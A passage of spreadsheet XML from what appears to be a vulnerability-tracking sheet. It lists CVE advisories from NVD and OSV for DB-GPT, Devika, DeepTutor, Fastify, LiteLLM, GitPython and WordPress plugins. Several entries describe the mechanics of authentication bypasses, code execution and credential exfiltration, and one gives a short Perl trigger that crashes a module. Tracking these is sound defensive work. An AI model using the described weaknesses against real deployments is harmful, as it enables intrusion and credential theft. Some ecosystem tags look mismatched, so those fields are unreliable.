      <c r="B622" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C622" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51864</t>
        </is>
      </c>
      <c r="D622" s="5" t="inlineStr"/>
      <c r="E622" s="5" t="inlineStr"/>
      <c r="F622" s="5" t="inlineStr"/>
      <c r="G622" s="5" t="inlineStr"/>
      <c r="H622" s="5" t="inlineStr"/>
      <c r="I622" s="5" t="inlineStr"/>
      <c r="J622" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K622" s="5" t="inlineStr"/>
      <c r="L622" s="5" t="inlineStr"/>
      <c r="M622" s="5" t="inlineStr"/>
      <c r="N622" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O622" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P622" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q622" s="5" t="inlineStr"/>
      <c r="R622" s="5" t="inlineStr"/>
      <c r="S622" s="5" t="inlineStr">
        <is>
          <t>DB-GPT v0.7.5 and v0.8.0 contains directory traversal in python_file_upload (packages/dbgpt-app/src/dbgpt_app/openapi/api_v1/python_upload_api.py:42). A remote attacker can use the validated exploitation path to write files outside the intended workspace or storage boundary.</t>
        </is>
      </c>
      <c r="T622" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51864</t>
        </is>
      </c>
    </row>
    <row r="623">
      <c r="A623" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B623" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C623" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51866</t>
        </is>
      </c>
      <c r="D623" s="5" t="inlineStr"/>
      <c r="E623" s="5" t="inlineStr"/>
      <c r="F623" s="5" t="inlineStr"/>
      <c r="G623" s="5" t="inlineStr"/>
      <c r="H623" s="5" t="inlineStr"/>
      <c r="I623" s="5" t="inlineStr"/>
      <c r="J623" s="5" t="inlineStr">
        <is>
          <t>react</t>
        </is>
      </c>
      <c r="K623" s="5" t="inlineStr"/>
      <c r="L623" s="5" t="inlineStr"/>
      <c r="M623" s="5" t="inlineStr"/>
      <c r="N623" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O623" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P623" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q623" s="5" t="inlineStr"/>
      <c r="R623" s="5" t="inlineStr"/>
      <c r="S623" s="5" t="inlineStr">
        <is>
          <t>In DB-GPT 0.7.5 and 0.8.0, a skill uploaded through the real /api/v1/skills/upload route can later be executed through the real /api/v1/chat/react-agent flow.</t>
        </is>
      </c>
      <c r="T623" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51866</t>
        </is>
      </c>
    </row>
    <row r="624">
      <c r="A624" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B624" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C624" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51867</t>
        </is>
      </c>
      <c r="D624" s="5" t="inlineStr"/>
      <c r="E624" s="5" t="inlineStr"/>
      <c r="F624" s="5" t="inlineStr"/>
      <c r="G624" s="5" t="inlineStr"/>
      <c r="H624" s="5" t="inlineStr"/>
      <c r="I624" s="5" t="inlineStr"/>
      <c r="J624" s="5" t="inlineStr"/>
      <c r="K624" s="5" t="inlineStr"/>
      <c r="L624" s="5" t="inlineStr"/>
      <c r="M624" s="5" t="inlineStr"/>
      <c r="N624" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O624" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P624" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q624" s="5" t="inlineStr"/>
      <c r="R624" s="5" t="inlineStr"/>
      <c r="S624" s="5" t="inlineStr">
        <is>
          <t>agentgpt v.1.0.0 is vulnerable to Incorrect Access Control in next/src/server/api/routers/agentRouter.ts. An externally reachable path accepts a caller-selected object or tenant identifier and reaches a data-access operation without a visible owner, tenant, workspace, or membership binding on that object.</t>
        </is>
      </c>
      <c r="T624" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51867</t>
        </is>
      </c>
    </row>
    <row r="625">
      <c r="A625" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B625" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C625" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51869</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2026-09-30</t>
        </is>
      </c>
      <c r="P625" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q625" s="5" t="inlineStr"/>
      <c r="R625" s="5" t="inlineStr"/>
      <c r="S625" s="5" t="inlineStr">
        <is>
          <t>DB-GPT v0.8.0 sandbox API silently falls back to LocalRuntime and executes code on host.</t>
        </is>
      </c>
      <c r="T625" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51869</t>
        </is>
      </c>
    </row>
    <row r="626">
      <c r="A626" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B626" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C626" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51870</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2026-09-30</t>
        </is>
      </c>
      <c r="P626" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q626" s="5" t="inlineStr"/>
      <c r="R626" s="5" t="inlineStr"/>
      <c r="S626" s="5" t="inlineStr">
        <is>
          <t>DeepTutor v1.4.0 is vulnerable to command execution in /tutorbot/agent/tools/shell.py:ExecTool.execute.</t>
        </is>
      </c>
      <c r="T626" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51870</t>
        </is>
      </c>
    </row>
    <row r="627">
      <c r="A627" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B627" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C627" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51871</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2026-09-30</t>
        </is>
      </c>
      <c r="P627" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q627" s="5" t="inlineStr"/>
      <c r="R627" s="5" t="inlineStr"/>
      <c r="S627" s="5" t="inlineStr">
        <is>
          <t>Devika v1.0 is vulnerable to Code Injection in the Runner.execute function in src/agents/runner/runner.py which allows an attacker to achieve arbitrary code execution by exploiting the direct execution of LLM-generated content.</t>
        </is>
      </c>
      <c r="T627" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51871</t>
        </is>
      </c>
    </row>
    <row r="628">
      <c r="A628" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B628" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C628" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51872</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2026-09-30</t>
        </is>
      </c>
      <c r="P628" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q628" s="5" t="inlineStr"/>
      <c r="R628" s="5" t="inlineStr"/>
      <c r="S628" s="5" t="inlineStr">
        <is>
          <t>Devika v1.0 is vulnerable to Code Injection via the Runner.run_code function in src/agents/runner/runner.py.</t>
        </is>
      </c>
      <c r="T628" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51872</t>
        </is>
      </c>
    </row>
    <row r="629">
      <c r="A629" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B629" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C629" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76169</t>
        </is>
      </c>
      <c r="D629" s="5" t="inlineStr"/>
      <c r="E629" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F629" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G629" s="5" t="inlineStr"/>
      <c r="H629" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I629" s="5" t="inlineStr"/>
      <c r="J629" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K629" s="5" t="inlineStr"/>
      <c r="L629" s="5" t="inlineStr">
        <is>
          <t>npm:fastify</t>
        </is>
      </c>
      <c r="M629" s="5" t="inlineStr">
        <is>
          <t>5.12.2</t>
        </is>
      </c>
      <c r="N629" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O629" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P629" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q629" s="5" t="inlineStr"/>
      <c r="R629" s="5" t="inlineStr"/>
      <c r="S629" s="5" t="inlineStr">
        <is>
          <t>### Impact
Fastify routes a malformed URL under one plugin prefix to the custom not-found handler of a different sibling plugin, invoking the handler registered last and skipping the `preHandler` declared in its `setNotFoundHandler()`. When the request method has no route in the main router, a malformed request target reaches Fastify's internal not-found router before URL decoding and is dispatched through a single shared handler pointer, regardless of prefix and without the normal request lifecycle. An unauthenticated request to a public prefix can therefore reach an authentication-protected not-found handler registered under a different prefix and receive its full response, breaking prefix encapsulation and bypassing the authentication hook. Applications whose private or tenant fallbacks return protected data from a not-found handler are affected.
### Patches
Patched in fastify 5.12.2. Malformed URLs are now routed through the configured `onBadUrl` and `onMaxParamLength` handlers so they fail closed before any application not-found handler runs, and the shared not-found handler pointer has been removed.
### Workarounds
Reject malformed request targets before they reach the application, for example at an upstream proxy or gateway, and do not rely on a not-found handler to serve protected data. A global `onRequest` authentication hook does not mitigate this, because the malformed-URL path skips it.</t>
        </is>
      </c>
      <c r="T629" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76169</t>
        </is>
      </c>
    </row>
    <row r="630">
      <c r="A630" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B630" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C630" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80490</t>
        </is>
      </c>
      <c r="D630" s="5" t="inlineStr"/>
      <c r="E630" s="5" t="inlineStr"/>
      <c r="F630" s="5" t="inlineStr"/>
      <c r="G630" s="5" t="inlineStr"/>
      <c r="H630" s="5" t="inlineStr"/>
      <c r="I630" s="5" t="inlineStr"/>
      <c r="J630" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K630" s="5" t="inlineStr"/>
      <c r="L630" s="5" t="inlineStr"/>
      <c r="M630" s="5" t="inlineStr"/>
      <c r="N630" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O630" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P630" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q630" s="5" t="inlineStr"/>
      <c r="R630" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S630" s="5" t="inlineStr">
        <is>
          <t>Algorithm::AhoCorasick::XS versions through 0.04 for Perl read the haystack string length before the scalar is stringified.
The matches, first_match and match_details methods use the T_STD_STRING typemap to translate Perl scalars (SVs) into strings via the std::string constructor, using the SvPV macro to stringify the haystack input, and the SvCUR macro to determine the length of the SV.
When the input SVs are references, integers (IVs) or floats (NVs), the SvCUR macro will return an invalid length if it is run before the input is stringified, leading to an out-of-bounds read which can abort the process.
Note that the evaluation order of arguments to std::string is unspecified. Depending on the compiler, SvCUR may be run first and lead to an abort that cannot be caught within Perl.
This can be triggered when the haystack is a numeric value, for example,
    my $ac = Algorithm::AhoCorasick::XS-&gt;new( [ "11", "22" ] );
    $ac-&gt;matches( 211 );
This can occur when the haystack is the result of reading data from decoded JSON or a numeric database column. It can also be triggered when using a blessed object as a haystack.</t>
        </is>
      </c>
      <c r="T630" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80490</t>
        </is>
      </c>
    </row>
    <row r="631">
      <c r="A631" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B631" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C631" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81739</t>
        </is>
      </c>
      <c r="D631" s="5" t="inlineStr"/>
      <c r="E631" s="5" t="inlineStr"/>
      <c r="F631" s="5" t="inlineStr"/>
      <c r="G631" s="5" t="inlineStr"/>
      <c r="H631" s="5" t="inlineStr"/>
      <c r="I631" s="5" t="inlineStr"/>
      <c r="J631" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K631" s="5" t="inlineStr"/>
      <c r="L631" s="5" t="inlineStr"/>
      <c r="M631" s="5" t="inlineStr"/>
      <c r="N631" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O631" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P631" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q631" s="5" t="inlineStr"/>
      <c r="R631" s="5" t="inlineStr"/>
      <c r="S631" s="5" t="inlineStr">
        <is>
          <t>The Paytm Payment Gateway WordPress plugin before 2.8.9 does not sanitize and escape data it stores from payment callbacks before outputting it in an admin page, and the integrity check on those callbacks can be forged when the gateway is enabled without credentials, allowing unauthenticated users to store scripts that will run in the session of a store administrator.</t>
        </is>
      </c>
      <c r="T631" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81739</t>
        </is>
      </c>
    </row>
    <row r="632">
      <c r="A632" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B632" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C632" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81809</t>
        </is>
      </c>
      <c r="D632" s="5" t="inlineStr"/>
      <c r="E632" s="5" t="inlineStr"/>
      <c r="F632" s="5" t="inlineStr"/>
      <c r="G632" s="5" t="inlineStr"/>
      <c r="H632" s="5" t="inlineStr"/>
      <c r="I632" s="5" t="inlineStr"/>
      <c r="J632" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K632" s="5" t="inlineStr"/>
      <c r="L632" s="5" t="inlineStr"/>
      <c r="M632" s="5" t="inlineStr"/>
      <c r="N632" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O632" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P632" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q632" s="5" t="inlineStr"/>
      <c r="R632" s="5" t="inlineStr"/>
      <c r="S632" s="5" t="inlineStr">
        <is>
          <t>The Paytm Payment Gateway WordPress plugin before 2.8.9 does not properly escape data taken from payment callbacks before using it in a SQL statement, and the integrity check on those callbacks can be forged when the gateway is enabled without credentials, allowing unauthenticated users to perform SQL injection attacks.</t>
        </is>
      </c>
      <c r="T632" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81809</t>
        </is>
      </c>
    </row>
    <row r="633">
      <c r="A633" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B633" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C633" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84377</t>
        </is>
      </c>
      <c r="D633" s="5" t="inlineStr"/>
      <c r="E633" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F633" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G633" s="5" t="inlineStr"/>
      <c r="H633" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I633" s="5" t="inlineStr"/>
      <c r="J633" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K633" s="5" t="inlineStr"/>
      <c r="L633" s="5" t="inlineStr">
        <is>
          <t>PyPI:litellm</t>
        </is>
      </c>
      <c r="M633" s="5" t="inlineStr">
        <is>
          <t>1.88.6, 1.89.7, 1.90.7, 1.91.5, 1.92.2, 1.93.2</t>
        </is>
      </c>
      <c r="N633" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O633" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P633" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q633" s="5" t="inlineStr"/>
      <c r="R633" s="5" t="inlineStr"/>
      <c r="S633" s="5" t="inlineStr">
        <is>
          <t>### Impact
Any authenticated LiteLLM proxy user could redirect an outbound provider call to a destination they control and cause the proxy to send its own configured provider credentials to that destination. The proxy's request-body validation was a denylist that did not cover every sensitive parameter and did not inspect parameters nested inside other request fields, so a caller could supply a routing or credential value that the proxy applied without clearing the operator's stored key. Any authenticated user could therefore exfiltrate the operator's upstream provider credentials and other configured secrets, and perform Server-Side Request Forgery against internal services reachable from the proxy.
### Patches
Fixed in 1.96.2, 1.95.1, 1.94.3, 1.93.2, 1.92.2, 1.91.5, 1.90.7, 1.89.7, and 1.88.6.
### Workarounds
Set `general_settings.allow_client_side_credentials` to `false` so callers cannot override connection parameters, restrict proxy keys to trusted callers, and block the affected parameters (`api_base`, `base_url`, `model_list`, `fallbacks`, provider credential fields) at a reverse proxy or API gateway.</t>
        </is>
      </c>
      <c r="T633" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84377</t>
        </is>
      </c>
    </row>
    <row r="634">
      <c r="A634" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B634" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C634" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84428</t>
        </is>
      </c>
      <c r="D634" s="5" t="inlineStr"/>
      <c r="E634" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F634" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G634" s="5" t="inlineStr"/>
      <c r="H634" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I634" s="5" t="inlineStr"/>
      <c r="J634" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K634" s="5" t="inlineStr"/>
      <c r="L634" s="5" t="inlineStr">
        <is>
          <t>npm:fastify</t>
        </is>
      </c>
      <c r="M634" s="5" t="inlineStr">
        <is>
          <t>5.12.2</t>
        </is>
      </c>
      <c r="N634" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O634" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P634" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q634" s="5" t="inlineStr"/>
      <c r="R634" s="5" t="inlineStr"/>
      <c r="S634" s="5" t="inlineStr">
        <is>
          <t>### Impact
Fastify lowercases header-schema property names before compiling the schema, because Node.js stores request header names in lowercase. That normalization was incomplete: it lowercased only top-level `properties` keys and the root `required` array, and did not lowercase the JSON Schema Draft 7 `dependencies` keyword (its trigger keys and dependent property names) or names in nested subschemas. As a result, a header schema that uses `dependencies` to require one header when another is present (for example `X-Admin` requiring `X-Admin-Token`) never matches the lowercased request headers, so the dependency assertion is silently skipped. An unauthenticated remote client can send the header that activates a privileged path while omitting the header the dependency was meant to require, bypassing a schema-enforced security control. The header schema is idiomatic, valid JSON Schema Draft 7, and no custom validator, malformed request, or misconfiguration is required.
### Patches
Header-schema names are now normalized across all schema positions (`properties`, `required`, `dependencies`, `dependentRequired`, `dependentSchemas`, and nested subschemas). Patched in fastify `5.12.2`. The fix is also included in the `6.0.0` release. Header schemas referenced through an external shared `$ref` (registered with `addSchema`) are not reached by this normalization and now emit an `FSTSEC002` startup warning; inline the header schema to keep case-insensitive assertions in effect.
### Workarounds
If upgrading is not immediately possible, write header-schema names in lowercase so the `dependencies` and other case-sensitive assertions match Node's lowercased request headers, or enforce the cross-header requirement in an `onRequest` or `preValidation` hook instead of the schema.</t>
        </is>
      </c>
      <c r="T634" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84428</t>
        </is>
      </c>
    </row>
    <row r="635">
      <c r="A635" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B635" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C635" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84469</t>
        </is>
      </c>
      <c r="D635" s="5" t="inlineStr"/>
      <c r="E635" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F635" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G635" s="5" t="inlineStr"/>
      <c r="H635" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I635" s="5" t="inlineStr"/>
      <c r="J635" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K635" s="5" t="inlineStr"/>
      <c r="L635" s="5" t="inlineStr">
        <is>
          <t>npm:fastify</t>
        </is>
      </c>
      <c r="M635" s="5" t="inlineStr">
        <is>
          <t>5.12.2</t>
        </is>
      </c>
      <c r="N635" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O635" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P635" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q635" s="5" t="inlineStr"/>
      <c r="R635" s="5" t="inlineStr"/>
      <c r="S635" s="5" t="inlineStr">
        <is>
          <t>### Impact
Fastify decided whether to validate a request part by checking its schema for JavaScript truthiness. JSON Schema Draft 7 defines the boolean `false` as a valid schema that rejects every instance, but because `false` is falsy, a route that set `body`, `querystring`, `params`, or `headers` to `false` had that part left uncompiled: no validator was attached and the request reached the handler. An application that used `false` as a deny-all schema to make a route unreachable was therefore fully bypassed, and an unauthenticated remote client could reach the handler with any input. The same applied to the documented `query` alias for `querystring`. This is a complete bypass rather than a weak-schema issue, since `false` is the strongest JSON Schema assertion and must always fail.
### Patches
Request-part schemas are now selected by an explicit presence check rather than truthiness, so a boolean `false` (or `true`) schema is compiled and enforced, including through the `query` alias. Patched in fastify `5.12.2`. The fix is also included in the `6.0.0` release.
### Workarounds
If upgrading is not immediately possible, express a deny-all request schema with an always-failing object schema instead of the boolean `false` (for example `{ "not": {} }`), or reject the request in an `onRequest` hook.</t>
        </is>
      </c>
      <c r="T635" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84469</t>
        </is>
      </c>
    </row>
    <row r="636">
      <c r="A636" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B636" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C636" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84504</t>
        </is>
      </c>
      <c r="D636" s="5" t="inlineStr"/>
      <c r="E636" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F636" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G636" s="5" t="inlineStr"/>
      <c r="H636" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I636" s="5" t="inlineStr"/>
      <c r="J636" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K636" s="5" t="inlineStr"/>
      <c r="L636" s="5" t="inlineStr">
        <is>
          <t>npm:fastify</t>
        </is>
      </c>
      <c r="M636" s="5" t="inlineStr">
        <is>
          <t>5.12.2</t>
        </is>
      </c>
      <c r="N636" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O636" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P636" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q636" s="5" t="inlineStr"/>
      <c r="R636" s="5" t="inlineStr"/>
      <c r="S636" s="5" t="inlineStr">
        <is>
          <t>### Impact
Fastify runs a route's validator and, for a result shaped like `{ value, error }`, unwraps it: an `error` becomes a validation failure and `value` replaces the request part. This convention is intended for synchronous custom compilers (for example Joi). A JSON Schema `$async` validator, however, resolves with the validated data itself, so Fastify applied the same unwrapping to it. If a request part validated by an `$async` schema contains a `value` property, Fastify replaced the whole request part with that nested value before the handler ran, so a `value` or `error` property in the payload was attacker-controlled. An application that dispatches operations from the validated request body could then act on data that never satisfied the route schema, leading to unauthorized state changes or disclosure. Reaching the vulnerable path requires the route to use an `$async` request schema.
### Patches
Fastify no longer treats an asynchronous validation result as a `{ value, error }` wrapper: an async validator's resolved value is used only to determine pass or fail, and it can no longer replace the request part or inject an error. The synchronous custom-compiler contract is unchanged. Patched in fastify `5.12.2` and `6.0.0`.
### Workarounds
If upgrading is not immediately possible, avoid `$async` request schemas, or perform the security-sensitive check in an `onRequest` or `preHandler` hook rather than relying on the schema-validated request part. Custom async validator compilers should signal failure by throwing (rejecting) rather than returning an `{ error }` object.</t>
        </is>
      </c>
      <c r="T636" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84504</t>
        </is>
      </c>
    </row>
    <row r="637">
      <c r="A637" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B637" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C637" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86610</t>
        </is>
      </c>
      <c r="D637" s="5" t="inlineStr"/>
      <c r="E637" s="5" t="inlineStr"/>
      <c r="F637" s="5" t="inlineStr"/>
      <c r="G637" s="5" t="inlineStr"/>
      <c r="H637" s="5" t="inlineStr"/>
      <c r="I637" s="5" t="inlineStr"/>
      <c r="J637" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K637" s="5" t="inlineStr"/>
      <c r="L637" s="5" t="inlineStr"/>
      <c r="M637" s="5" t="inlineStr"/>
      <c r="N637" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O637" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P637" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q637" s="5" t="inlineStr"/>
      <c r="R637" s="5" t="inlineStr"/>
      <c r="S637" s="5" t="inlineStr">
        <is>
          <t>The Download Manager WordPress plugin before 3.3.71 does not sufficiently sanitise and escape a package setting before outputting it back in a page, which could allow users with the Author role and above to perform Stored Cross-Site Scripting attacks against any visitor who opens the package's download dialogue, including administrators. Only sites running PHP below 8.1 are affected, as the sanitisation applied when the setting is saved does not neutralise single quotes there.</t>
        </is>
      </c>
      <c r="T637" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86610</t>
        </is>
      </c>
    </row>
    <row r="638">
      <c r="A638" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B638" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C638" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87817</t>
        </is>
      </c>
      <c r="D638" s="5" t="inlineStr"/>
      <c r="E638" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F638" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G638" s="5" t="inlineStr"/>
      <c r="H638" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I638" s="5" t="inlineStr"/>
      <c r="J638" s="5" t="inlineStr">
        <is>
          <t>pypi, python</t>
        </is>
      </c>
      <c r="K638" s="5" t="inlineStr"/>
      <c r="L638" s="5" t="inlineStr">
        <is>
          <t>PyPI:gitpython</t>
        </is>
      </c>
      <c r="M638" s="5" t="inlineStr">
        <is>
          <t>3.1.60</t>
        </is>
      </c>
